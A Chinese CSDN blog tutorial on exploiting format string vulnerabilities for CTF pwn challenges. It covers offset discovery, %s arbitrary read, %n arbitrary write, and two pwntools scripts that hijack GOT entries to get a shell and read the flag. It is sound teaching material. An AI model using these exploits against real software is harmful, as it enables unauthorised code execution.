pwn入门--格式化字符串

于 2024-07-11 17:12:49 发布
阅读量432 收藏 9
点赞数 4
分类专栏: pwn 文章标签: pwn 笔记 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/140357255
版权

pwn入门–格式化字符串

确定偏移:

32位:

  1. gdb中格式化字符串在栈上的位置的,左边序号值 就是偏移。

  2. 先到printf函数的调用位置:

    image-20240710120200274

  3. 观查栈上的数据:

    image-20240710120155192

64位:

  1. gdb中格式化字符串在栈上的位置的,左边序号值+6 就是偏移(因为64位前6个参数要用寄存器rdi,rsi,rdx,rcx,r8,r9来传参,其余才用栈传参)。

  2. 先到printf函数的调用位置:

    image-20240710120438926

  3. 观察寄存器,和栈:

    image-20240710122358218

任意地址读:

  1. 主要使用 %m$s ,来实现 任意地址 读取数据:

    • 先利用第一步,确定格式化字符串的偏移为m
    • 然后确定要 读取 的数据地址:p (0x80504) ,
    • 最后构造,以字符串的形式输出地址为0x80504的值(%s会将0x80504当成地址去解析):
    payload = p64(0x80504)+b"%m$s"

任意地址写:

  1. 主要使用 %m$n ,来实现 任意地址 写入数据。

  2. 使用工具 fmtstr_payload 快速钩爪格式化字符串:

    • 先利用第一步,确定格式化字符串的偏移为m
    • 然后确定要 写入 的数据地址:p (0x80504) 。
    • %n会将printf函数已经输出的字符个数num,写入到地址0x80504处:
    payload = p32(0x80504) + b"a"*(num-4) + b"%m$n"

    • 使用 fmtstr_payload 工具快速构造;

      payload = fmtstr_payload(offset,{write_addr:write_data},numbwritten=0)

      offset :格式化字符串的偏移

      write_addr :要写入的地址

      write_data :要写如的值

      numbwritten :printf已经输出的字符个数

例题1:

  1. 挟持got表
from pwn import *
# from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')

p=remote("node5.anna.nssctf.cn",24575)
# p = process("./pwn")
elf = ELF("./pwn")

read_got = elf.got["read"]
success("read_got==>"+hex(read_got))
backdoor = elf.symbols["backdoor"]
print(hex(backdoor))
payload = fmtstr_payload(11,{read_got:backdoor})
p.sendline(payload)
p.sendline(b'cat flag')
p.interactive()

例题2:

地址:BUUCTF在线评测 (buuoj.cn)

注意点:格式化字符串在栈上对齐

  1. 题目只有一个格式化字符串,没有栈溢出,所以只能考虑挟持got表:

    image-20240710172120217

  2. gdb调试,确定格式化字符串偏移,注意栈对齐:

    image-20240710172537479

  3. 确定格式化字符串已经输出的字符个数:

    image-20240710172833648

  4. EXP:

    from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')

# p=remote("node5.buuoj.cn",26396)
p = process("./pwn")
elf = ELF("./pwn")
puts_addr = elf.got["puts"]
strlen_addr = elf.got["strlen"]

p.recv()
payload = b'a'+p32(puts_addr)+b"%8$s"
p.sendline(payload)
p.recvuntil(p32(puts_addr))
addr = u32(p.recv(4))
success("puts_addr==>"+hex(addr))

libc_addr = addr-0x5fcb0
sys_addr = libc_addr+0x3adb0
success("libc_addr==>"+hex(libc_addr))
success("sys_addr==>"+hex(sys_addr))

payload = b"a" + fmtstr_payload(8,{strlen_addr:sys_addr},10)
print(payload)
p.sendline(payload)
p.sendline(b';/bin/sh')		#切割前面的字符,形成system("/bin/sh")
p.sendline(b'cat flag')
p.interactive()

    成功拿到本地flag:

    image-20240710172924720

割前面的字符,形成system(“/bin/sh”)
p.sendline(b’cat flag’)
p.interactive()


成功拿到本地flag:

[外链图片转存中...(img-XKQppsBW-1720688965187)]
波克比QWQ
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn 格式化字符串漏洞
清霂的博客
03-10 450
7.cgpwn2 file checksec ida32
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Pwn 学习 格式化字符串
MrTreebook的博客
08-19 1505
每一种 pattern 的含义请具体参考维基百科的格式化字符串。以下几个 pattern 中的对应选择需要重点关注。可以看到%10p的作用是直接打印第十个%p位置上的指针内容。通过格式化字符串可以无限泄露栈上的数据。
PWN入门(8)格式化字符串漏洞
Ba1_Ma0的博客
09-26 870
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入07文件夹还是和上一篇文件一样,设置文件权限,将flag设置位只能root可读设置程序位suid位。
noxCTF-pwn1-格式化字符串
Peanuts
09-09 578
格式化字符串 额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr from pwn import * context.log_level='debug' elf = ELF('./believeMe.dms') libc = elf.libc p = remote('18.223.228.52',13337) #p = pr...
[pwn] 7.格式化字符串
H4ppyD0g的博客
09-01 573
a
pwn入门学习-附件资源
03-05
pwn入门学习-附件资源
[pwn]格式化字符串:0ctf 2015 login writeup
Breeze的博客
09-26 9130
文章目录格式化字符串:0ctf 2015 login writeup格式化字符串漏洞题目分析利用思路开始利用 格式化字符串:0ctf 2015 login writeup 格式化字符串漏洞 格式化字符串漏洞是不正确的使用printf函数导致的,为了简便使用printf(s),而s是用户可控的字符串,就会导致任意地址读和任意地址写漏洞。**归根结底,由于printf的参数个数是不确定的,而函数本身根...
PWN学习之格式化字符串及CTF常见利用手法
蚁景网安学院
02-18 920
格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中 printf、sprintf、fprintf 等函数用于将数据格式化字符串并进行输出。当这些函数的格式字符串参数(比如 %s、%d等)由用户提供时,如果未正确地对用户提供的输入进行验证和过滤,就可能存在格式化字符串漏洞。
PWN_格式化字符串格式字符
个人笔记
03-04 514
格式化字符串格式字符 格式 含义 %c 输出字符,配上%n可用于向指定地址写数据。 %d 输出十进制整数,配上%n可用于向指定地址写数据。 %x 输出16进制数据,如%ix表示要泄漏偏移i处4字节长的16进制数据,x表示要泄漏偏移i处4字节长的16进制数据,%ix表示要泄漏偏移i处4字节长的16进制数据,lx表示要泄漏偏移i处8字节长的16进制数据,32bit和64bit环境下一样。 %p 输出16进制数据,与%x基本一样,只是附加了前缀0x,在32bit下输出4字节,在64bi
pwn格式化字符串的浅显理解
javagty6778的博客
03-19 214
这时候可以输入格式化字符 %d,%p等控制函数的输出。2.### 简单解释格式化字符串原理1.这是两段程序的源码:* 1️⃣。2.对应的汇编代码:* 1️⃣。
CTF PWN 格式化字符串
VisualNull的博客
06-05 1205
CTF PWN格式化字符串
PWN格式化字符串漏洞原理
u014377094的博客
05-21 1606
今天做Dest0g3 520迎新赛的dest_love,发现是格式化字符串问题,但是由于其内容保存在了bss区,导致无法像过去那样简单利用,坐牢半天没做出来,但恰巧遇到了,就复习一下格式化字符串漏洞的基本原理吧,顺便补一下过去基本功不扎实的问题 首先是格式化字符串漏洞长啥样子 printf(format); //format是一个字符串 如何触发? 一般来说通过%p泄露内容,通过%n来写内容。 %p也可用%08x(32位)替代,不过还是推荐%p,因为%p无需考虑32还是64的问题。 t
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5849
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
最新发布
qq_66013948的博客
03-05 1241
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
python练习—pwn格式化字符串
v_3483608762的博客
07-25 595
[第五空间2019 决赛]PWN5 好长时间没有写博客了,记录一下。 1, printf(&buf)为明显的格式化字符串漏洞 格式化字符串漏洞 可以利用他覆盖掉un_804c044,从而可以执行后门程序。 2第一种方法 使用fmtster——payload函数,简单了当的覆盖掉目标地址。 详情 :fmtster函数 from pwn import * p=process('pwn') # p=remote('node4.buuoj.cn',29440) unk_char=0x0804C044 pa
菜鸟PWN手进阶之格式化字符串
re1wn
01-05 6494
菜鸟PWN手进阶之格式化字符串
PWN格式化字符串漏洞
WateranFire的博客
07-19 655
漏洞使用:     1.泄露canary之类的信息     2.修改特定地址的内容 hints:      1.当需要表示第N个参数时,可以通过"%N$llx"的方法实现;      2.当利用%n修改数据时,如果数据较大,可以前面利用"%099999d"来构造。  ...
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值